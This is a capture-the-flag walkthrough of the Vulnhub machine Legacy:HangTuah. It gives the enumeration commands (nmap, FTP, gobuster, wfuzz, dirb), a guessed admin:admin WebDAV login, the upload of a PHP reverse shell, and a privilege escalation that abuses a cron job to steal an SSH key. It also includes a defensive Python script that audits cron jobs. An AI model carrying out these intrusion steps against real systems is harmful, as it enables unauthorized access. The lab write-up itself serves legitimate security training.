Legacy:HangTuah - Walkthrough [Vulnhub]

Here's my solution for Legacy:HangTuah.
The machine can be downloaded from here.

Nmap
Scanning for all TCP ports.
$ nmap -sC -sV -p- 192.168.1.109


We find 3 ports open.

Enumeration
From nmap's output we see that the FTP service on port 777 allows anonymous login, so let's check it out.
$ ftp 192.168.1.109 777
Name: anonymous
Password: anonymous


We find a file named notes.txt under the hidden directory .secret.

No hints or useful information yet.

Using gobuster to scan for directories.
$ gobuster -u http://192.168.1.109/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Browsing /robots.txt

We map the IP to the host name by editing the /etc/hosts file.

Let's browse the web.



While scanning for directories using gobuster, we find a text file, admin.txt.
The file says "we are admin". Maybe a hint for the user name.


We enumerate subdomains using wfuzz.
$ wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.legacyhangtuah.com" --hw 968 legacyhangtuah.com

We find one. To access this subdomain we need to add its host name to the /etc/hosts file as well.


Browsing the subdomain.

Checking the source of the page, no hints. Let's scan for directories.
$ dirb http://door.legacyhangtuah.com/ -r

We find a /webdav directory; browsing it prompts for credentials.

Earlier, while enumerating, we found the file admin.txt, which hinted at the user name admin, so we try admin as the password too.
And yes, it's correct.


Now we upload the PHP reverse shell file.
$ cadaver http://door.legacyhangtuah.com/webdav
Username: admin
Password: admin



Getting Access
Now, to run this file, we browse to the location of our PHP reverse shell file, or simply refresh the page, enter the credentials again and click on the payload file.

Meanwhile, we start the netcat listener.


 

We successfully get the reverse shell.

Privilege Escalation
From www-data>pendekar.
We find a hidden file, .bash_history, under the directory /var/www, which gives us a hint about how a file can be manipulated for privilege escalation.




After reading .bash_history, we navigate to the directory /opt/pendekar.
Within this directory we find 2 files: official_letter.txt and toyou.txt.

We observe that whatever command we place in the file official_letter.txt, its output appears in the file send_letter.txt, located under the directory /home/pendekar.

We also observe that we need to wait 1-2 minutes for the output to appear, which suggests a cron job is running in the background.

To escalate our privileges we enter the command/payload that retrieves the SSH key of the user pendekar (hint from the file .bash_history).
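The privilege escalation above works because a scheduled job executes whatever gets written into official_letter.txt, a file the low-privileged shell can edit. Below is an added example (not from the original walkthrough) of how a defender could catch that class of misconfiguration: it parses /etc/crontab style lines and flags any command that references a file writable by group or others. It assumes the job is an /etc/crontab style entry that executes the file; the crontab lines, file names and temporary directory are constructed for the demo.

```python
# Added example (not from the walkthrough): flag cron jobs whose command
# references a file that group or others can write. Inputs are constructed.
import os
import re
import stat
import tempfile

PATH_RE = re.compile(r"(/[\w.\-/]+)")  # absolute paths in a command field

def writable_by_others(path: str) -> bool:
    """True if the file exists and has the group- or world-write bit set."""
    if not os.path.exists(path):
        return False
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def parse_system_cron_line(line: str):
    """Parse an /etc/crontab style line: five schedule fields, user, command."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.split(None, 6)
    if len(parts) < 7:
        return None
    return {"schedule": " ".join(parts[:5]), "user": parts[5], "command": parts[6]}

def audit_cron_lines(lines):
    """Return (user, command, path) for each referenced file others can edit."""
    findings = []
    for line in lines:
        entry = parse_system_cron_line(line)
        if entry is None:
            continue
        for path in PATH_RE.findall(entry["command"]):
            if writable_by_others(path):
                findings.append((entry["user"], entry["command"], path))
    return findings

def demo():
    """Constructed scenario: one world-writable 'letter', one owner-only script."""
    with tempfile.TemporaryDirectory() as d:
        loose = os.path.join(d, "official_letter.txt")
        tight = os.path.join(d, "backup.sh")
        for p in (loose, tight):
            open(p, "w").close()
        os.chmod(loose, 0o666)  # anyone can rewrite what the job will execute
        os.chmod(tight, 0o700)  # owner-only: must not be flagged
        lines = [f"* * * * * pendekar /bin/sh {loose}",
                 f"0 3 * * * root /bin/sh {tight}",
                 "# * * * * * root /bin/sh /etc/disabled.sh"]
        return audit_cron_lines(lines)
```

Running demo() reports only the job that executes the world-writable file; the owner-only script and the commented-out entry are ignored.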



We copy the private key and save it on our machine. Before connecting over SSH we change the permissions of the key file.
$ chmod 600 key
$ ssh -i key pendekar@192.168.1.109

User Flag.

From pendekar>hangtuah.
We find a hint in the file lastnotes.txt, located under /home/hangtuah.



The hint looks like it is encoded in Morse code. We can use CyberChef to decode it.



The words to note are: permission already and key.
We already have the private key of the user pendekar; let's try to access the other user, hangtuah, with the same private key.
$ ssh -i key hangtuah@192.168.1.109


From hangtuah>root.
We check for sudo rights.

Let's escalate and get the root flag.




 





